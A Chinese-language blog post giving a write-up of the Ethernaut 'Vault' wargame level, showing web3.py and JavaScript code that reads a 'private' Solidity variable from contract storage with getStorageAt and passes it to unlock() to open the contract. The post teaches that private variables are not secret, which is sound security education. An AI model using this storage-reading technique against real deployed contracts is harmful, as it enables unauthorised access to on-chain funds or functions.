<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/myhead.jpeg">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/myhead.jpeg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/myhead.jpeg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="这道题很明显是需要我们知道 password 的值才可以，而 password 是 private 的，这就难了，没法直接从合约中读取出来，不过有过一点 solidity 编程经验的同学应该都知道 solidity 中的 private 变量只是外部合约不能读取其值，但是由于它是存在于区块链上的，区块链上的内容都是开源的。所以其实我们还是有办法读取 private 变量的值的">
<meta property="og:type" content="article">
<meta property="og:title" content="Ethernaut题解 - Vault">
<meta property="og:url" content="http://yoursite.com/2020/06/26/Ethernaut%E9%A2%98%E8%A7%A3-Vault/index.html">
<meta property="og:site_name" content="PolarSpace">
<meta property="og:description" content="这道题很明显是需要我们知道 password 的值才可以，而 password 是 private 的，这就难了，没法直接从合约中读取出来，不过有过一点 solidity 编程经验的同学应该都知道 solidity 中的 private 变量只是外部合约不能读取其值，但是由于它是存在于区块链上的，区块链上的内容都是开源的。所以其实我们还是有办法读取 private 变量的值的">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-06-25T16:52:20.000Z">
<meta property="article:modified_time" content="2020-06-29T14:18:06.432Z">
<meta property="article:author" content="PolarSpace">
<meta property="article:tag" content="Solidity">
<meta property="article:tag" content="合约安全">
<meta property="article:tag" content="Ethernaut">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/2020/06/26/Ethernaut%E9%A2%98%E8%A7%A3-Vault/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Ethernaut题解 - Vault | PolarSpace</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">PolarSpace</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">极</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/06/26/Ethernaut%E9%A2%98%E8%A7%A3-Vault/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/myhead.jpeg">
      <meta itemprop="name" content="PolarSpace">
      <meta itemprop="description" content="登峰造极境">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="PolarSpace">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Ethernaut题解 - Vault
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-06-26 00:52:20" itemprop="dateCreated datePublished" datetime="2020-06-26T00:52:20+08:00">2020-06-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-06-29 22:18:06" itemprop="dateModified" datetime="2020-06-29T22:18:06+08:00">2020-06-29</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Ethernaut%E9%A2%98%E8%A7%A3/" itemprop="url" rel="index"><span itemprop="name">Ethernaut题解</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这道题很明显是需要我们知道 password 的值才可以，而 password 是 private 的，这就难了，没法直接从合约中读取出来，不过有过一点 solidity 编程经验的同学应该都知道 solidity 中的 private 变量只是外部合约不能读取其值，但是由于它是存在于区块链上的，区块链上的内容都是开源的。所以其实我们还是有办法读取 private 变量的值的</p>
<a id="more"></a>

<h3 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h3><p>在做这道题的时候，我还不知道怎么去读取 private 的值，所以就 Google 了一下，查询到我们可以使用<a href="https://stackoverflow.com/questions/50493197/solidity-accessing-private-variable" target="_blank" rel="noopener">这种方法</a>去获取：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">web3.eth.getStorageAt(<span class="string">"0x501..."</span>, <span class="number">5</span>)</span><br></pre></td></tr></table></figure>

<p>第一个参数是合约地址，第二个参数是状态变量的位置。那么我们就把题目部署好的合约地址复制进去，注意到 password 是第二个状态变量，所以第二个参数就是 1（从 0 开始）。由于我对 Python 比较熟悉，所以我就利用 Web3.py 库进行调用。不过其实使用 Javascript 更加简单</p>
<h4 id="使用-Python-调用"><a href="#使用-Python-调用" class="headerlink" title="使用 Python 调用"></a>使用 Python 调用</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> web3 <span class="keyword">import</span> Web3</span><br><span class="line"></span><br><span class="line">ropsten = <span class="string">'https://ropsten.infura.io/v3/输入你的Infura ID'</span></span><br><span class="line">web3 = Web3(Web3.HTTPProvider(ropsten))</span><br><span class="line"></span><br><span class="line">abi = json.loads(<span class="string">'题目合约的abi，可以复制到Remix中编译得到'</span>)</span><br><span class="line">contract_address = web3.toChecksumAddress(<span class="string">'合约地址'</span>)</span><br><span class="line">contract = web3.eth.contract(address=contract_address, abi=abi)</span><br><span class="line"></span><br><span class="line">print(web3.eth.getStorageAt(contract_address, <span class="number">1</span>))</span><br></pre></td></tr></table></figure>

<p>打印出来，结果为</p>
<blockquote>
<p>b’A very strong secret password :)’</p>
</blockquote>
<p>这是一个字节字符串，我们需要将它从字符串转换为 bytes32 类型才可以，Google 了一下<a href="https://ethereum.stackexchange.com/questions/9142/how-to-convert-a-string-to-bytes32" target="_blank" rel="noopener">转换方法</a>，我们通过这个方法就可以将上面的字符串转换为 bytes32 类型的，注意使用该方法时，参数没有前面的 b，即：</p>
<blockquote>
<p>A very strong secret password :)</p>
</blockquote>
<p>转换得到的结果为</p>
<blockquote>
<p>0x412076657279207374726f6e67207365637265742070617373776f7264203a29</p>
</blockquote>
<p>这是一个 16 进制的数字，是可以作为参数直接传入题目的 unlock 函数的，在题目的控制台中，输入：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> contract.unlock(<span class="string">'0x412076657279207374726f6e67207365637265742070617373776f7264203a29'</span>)</span><br></pre></td></tr></table></figure>

<p>发起交易，等待执行成功，再看看 locked 的值，已经变成了 false：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> contract.locked()</span><br></pre></td></tr></table></figure>

<p>点击 Submit，发起交易，通关！</p>
<h4 id="使用-Javascript-调用"><a href="#使用-Javascript-调用" class="headerlink" title="使用 Javascript 调用"></a>使用 Javascript 调用</h4><p>上面使用 Python 的方法很繁琐，其实我们直接在控制台中使用 Javascript 调用就可以了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">web3.eth.getStorageAt(contractAddress, 1)</span><br></pre></td></tr></table></figure>

<p>但是 MetaMask 中有点问题，是和回调函数相关的（这里我没有深究），因此直接这样调用会出错，所以，应该这样调用：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">web3.eth.getStorageAt(contractAddress, <span class="number">1</span>, </span><br><span class="line"><span class="function"><span class="keyword">function</span>(<span class="params">error, result</span>) </span>&#123;password = result&#125;)</span><br></pre></td></tr></table></figure>

<p>打印 password 直接就能获取到上面那个 0x412… 开头的数，然后剩余步骤相同，将其作为参数调用 unlock 函数即可。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这道题给我们的启发就是不要依赖 Solidity 中的 private 变量，它并不是那么地 private。</p>
<h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h3><p><a href="https://stackoverflow.com/questions/50493197/solidity-accessing-private-variable" target="_blank" rel="noopener">https://stackoverflow.com/questions/50493197/solidity-accessing-private-variable</a></p>
<p><a href="https://ethereum.stackexchange.com/questions/9142/how-to-convert-a-string-to-bytes32" target="_blank" rel="noopener">https://ethereum.stackexchange.com/questions/9142/how-to-convert-a-string-to-bytes32</a></p>
<p><a href="https://medium.com/coinmonks/ethernaut-vault-problem-b2675393650b" target="_blank" rel="noopener">https://medium.com/coinmonks/ethernaut-vault-problem-b2675393650b</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Solidity/" rel="tag"># Solidity</a>
              <a href="/tags/%E5%90%88%E7%BA%A6%E5%AE%89%E5%85%A8/" rel="tag"># 合约安全</a>
              <a href="/tags/Ethernaut/" rel="tag"># Ethernaut</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/06/25/Ethernaut%E9%A2%98%E8%A7%A3-Coin-Flip/" rel="prev" title="Ethernaut题解 - Coin Flip">
      <i class="fa fa-chevron-left"></i> Ethernaut题解 - Coin Flip
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/06/29/WETH%E6%BA%90%E7%A0%81%E5%89%96%E6%9E%90/" rel="next" title="WETH 源码剖析">
      WETH 源码剖析 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#题解"><span class="nav-text">题解</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#使用-Python-调用"><span class="nav-text">使用 Python 调用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用-Javascript-调用"><span class="nav-text">使用 Javascript 调用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#总结"><span class="nav-text">总结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考资料"><span class="nav-text">参考资料</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="PolarSpace"
      src="/images/myhead.jpeg">
  <p class="site-author-name" itemprop="name">PolarSpace</p>
  <div class="site-description" itemprop="description">登峰造极境</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="gray">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">PolarSpace</span>
</div>
  <!--<div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
